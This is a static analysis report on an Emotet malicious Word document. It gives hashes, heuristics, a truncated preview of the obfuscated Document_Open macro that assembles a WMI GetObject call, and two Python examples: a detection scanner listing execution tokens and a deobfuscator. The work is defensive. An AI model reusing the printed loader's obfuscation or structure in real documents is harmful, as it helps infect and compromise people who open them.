Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a95e5f3c88c9004b…

MALICIOUS

Office (OLE)

Size: 183.1 KB · Created: 2019-12-20 17:07:00 · Authoring application: Microsoft Office Word · First seen: 2020-02-04
MD5: 77a750dd8ea463eeaf1d63422332b2fd
SHA-1: b3ca35d89f7e387478a52060613a5e7e9e58b4d4
SHA-256: a95e5f3c88c9004ba2daf3ee43e7ade9b2245c535c4cb19cdcad348f261f2874
Risk score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the file with the signature 'Doc.Downloader.Emotet-7473497-0', which points strongly at the Emotet family. The VBA project contains a Document_Open handler, so the macro runs as soon as the document is opened with macros enabled, and the GetObject call is consistent with a downloader/initial-execution stage rather than a self-contained payload. The extracted source shows the obfuscation style: every procedure is padded with `Do While <name> = 1 ... Loop` blocks whose loop variable is never assigned (an unassigned VBA variant is Empty, and Empty = 1 is False, so the body never executes), with filler arithmetic such as `234 + 423`, and with lorem-ipsum string assignments. The real string is assembled from form-control properties (Aojplemq.Gzuokbkyuug, Jeuwzqvsdrcqz.*.Tag) and from a string Split on the delimiter "__&888*&^bBGks^@"; the fragments visible before the preview is truncated ("wi", "nmg", "mts") assemble to "winmgmts", the WMI moniker commonly passed to GetObject.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7473497-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open event handler runs as soon as the document is opened with macros enabled; no further user interaction is needed, which is why it is the standard entry point for maldoc loaders.
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call in the macro. GetObject takes a moniker string, and the Split fragments visible in the extracted source ("wi", "nmg", "mts") assemble to "winmgmts", the WMI moniker; a GetObject on WMI is the usual way to spawn a process without a direct Shell call.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main   In document text (OLE body)
    This is the DrawingML XML namespace URI that Word writes into any document containing drawing objects; it is not a download or C2 location and should not be treated as an indicator.
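The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above is a co-occurrence rule over raw stream bytes. The following is an added example of that idea, not the analysis platform's own rule set: it scans whatever VBA-related bytes it is handed (a module stream, the _VBA_PROJECT stream, or decoded source) for auto-execution tokens and execution/download tokens in both ASCII and UTF-16LE, so it still fires when source extraction failed and only p-code and identifier tables survive. The token lists and the three sample blobs are constructed for illustration.

```python
import re

# Added example, not the platform's code. Token lists are illustrative
# assumptions; a production rule set would be larger and tuned against
# false positives (e.g. "Shell" as a substring of an ordinary identifier).
AUTOEXEC_TOKENS = ("Document_Open", "AutoOpen", "Auto_Open",
                   "Workbook_Open", "AutoExec", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "winmgmts",
               "WScript.Shell", "Win32_Process", "URLDownloadToFile",
               "powershell", "cmd.exe")


def _token_regex(token):
    """Match a token in ASCII or UTF-16LE, case-insensitively.

    No word boundaries: identifiers in compiled VBA streams are stored
    length-prefixed rather than NUL-terminated, so a boundary would miss hits.
    """
    ascii_form = re.escape(token.encode("ascii"))
    utf16_form = re.escape(token.encode("utf-16-le"))
    return re.compile(b"(?:" + ascii_form + b")|(?:" + utf16_form + b")",
                      re.IGNORECASE)


_AUTOEXEC_RE = {t: _token_regex(t) for t in AUTOEXEC_TOKENS}
_EXEC_RE = {t: _token_regex(t) for t in EXEC_TOKENS}


def scan_vba_stream(data: bytes) -> dict:
    """Return the tokens found and whether the co-occurrence rule fires."""
    autoexec = [t for t, rx in _AUTOEXEC_RE.items() if rx.search(data)]
    execs = [t for t, rx in _EXEC_RE.items() if rx.search(data)]
    return {"autoexec": autoexec, "exec": execs,
            "hit": bool(autoexec) and bool(execs)}


# Constructed samples (not bytes from the real file). The first mimics a
# module stream where only a length-prefixed ASCII identifier table of a
# Document_Open macro calling GetObject("winmgmts:...") survived; the second
# carries the same tokens in UTF-16LE with odd casing; the third is a benign
# auto-open macro with no execution primitive.
SAMPLE_PCODE_ASCII = (b"\x00\x00\x0dDocument_Open\x00\x00\x09GetObject"
                      b"\x00\x00\x09winmgmts:")
SAMPLE_PCODE_UTF16 = ("DOCUMENT_open".encode("utf-16-le") + b"\x00\x00"
                      + "GETOBJECT".encode("utf-16-le"))
SAMPLE_BENIGN = (b"Private Sub Document_Open()\r\n"
                 b'    MsgBox "Welcome"\r\n'
                 b"End Sub\r\n")

if __name__ == "__main__":
    for name, blob in [("ascii p-code", SAMPLE_PCODE_ASCII),
                       ("utf-16 p-code", SAMPLE_PCODE_UTF16),
                       ("benign source", SAMPLE_BENIGN)]:
        print(name, scan_vba_stream(blob))
```

The third sample is the important negative case: an auto-open handler on its own is common in legitimate templates, so the rule only fires when an execution or download token is present in the same stream.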

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  7618 bytes
SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub

Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)
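The macro above hides a short string inside dead loops, filler arithmetic and a Split on the delimiter "__&888*&^bBGks^@". The following is an added example of a static deobfuscator for exactly this pattern; it is not the sample's code nor the platform's. It strips the two kinds of padding seen in the preview and rebuilds the string behind each Split(...) call. Two assumptions are labelled in the code: the fragments are joined in order with an empty separator (the joining code lies past the truncated preview), and the constructed sample stops at the third fragment, "mts", because nothing beyond that is visible on the page. The delimiter itself is taken from the extracted macro.

```python
import re

# Added example, not the sample's or the platform's code.
DELIM = "__&888*&^bBGks^@"   # delimiter as it appears in the extracted macro

# A `Do While <var> = 1 ... Loop` block whose loop variable is never assigned:
# an unassigned VBA variant is Empty, Empty = 1 is False, so the body is dead.
_DEAD_LOOP_RE = re.compile(
    r"^[ \t]*Do While [A-Za-z_]\w* = 1\r?\n.*?^[ \t]*Loop[ \t]*\r?\n",
    re.MULTILINE | re.DOTALL)
# Filler assignments of the form `Name = 234 + 423`.
_FILLER_RE = re.compile(r"^[ \t]*[A-Za-z_]\w* = \d+ \+ \d+[ \t]*\r?\n",
                        re.MULTILINE)
# Split(<literal> + <literal> ...) with optional ` _` line continuations;
# only the first argument is captured, whatever follows it is ignored.
_SPLIT_RE = re.compile(
    r'Split\(((?:"[^"\r\n]*"\s*[+&]\s*(?:_\s*)?)*"[^"\r\n]*")')


def strip_junk(src: str) -> str:
    """Remove dead loops and filler arithmetic; keep everything else as-is."""
    return _FILLER_RE.sub("", _DEAD_LOOP_RE.sub("", src))


def vba_string_expr(expr: str) -> str:
    """Evaluate an expression made only of "..." literals joined with + or &.
    Handles the VBA "" escape for an embedded double quote."""
    parts = re.findall(r'"((?:[^"]|"")*)"', expr)
    return "".join(p.replace('""', '"') for p in parts)


def decode_split_calls(src: str, delim: str = DELIM, joiner: str = "") -> list:
    """For every Split(...) whose literal argument contains delim, return the
    string obtained by dropping the delimiter and joining the fragments.
    ASSUMPTION: fragments are concatenated in order with `joiner`; the real
    join step is not visible in the truncated preview."""
    out = []
    for m in _SPLIT_RE.finditer(src):
        joined = vba_string_expr(m.group(1))
        if delim in joined:
            out.append(joiner.join(p for p in joined.split(delim) if p))
    return out


# Constructed sample modelled on the Ewxdqdei function in the preview. It is
# NOT the original text: the Split call is cut at the third fragment ("mts")
# and closed with the delimiter variable, because the page truncates there.
SAMPLE = (
    "Function Ewxdqdei()\r\n"
    "   Hhahpldlmgytv = 234 + 423\r\n"
    "   Do While Bdbvsqpntmg = 1\r\n"
    "      Cpsroosgidlmw = 3 * Nxrrvfnk\r\n"
    '      Iisthuiee = ("Larry")\r\n'
    "Loop\r\n"
    'iwiwiiwiwjjsj = "__&888*&^bBGks^@"\r\n'
    'Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + _\r\n'
    '    "BGks^@mts", iwiwiiwiwjjsj)\r\n'
    "End Function\r\n"
)

if __name__ == "__main__":
    cleaned = strip_junk(SAMPLE)
    print(cleaned)
    print("recovered:", decode_split_calls(cleaned))
```

Running this on the constructed sample leaves a five-line function and recovers "winmgmts" from the three visible fragments, which is what the GetObject heuristic would expect to see. Against the full 7618-byte macros.bas the same two passes apply to every procedure; the remaining string pieces come from form-control properties (Gzuokbkyuug, the Jeuwzqvsdrcqz.* controls and their .Tag values) and have to be read from the form streams rather than the VBA source.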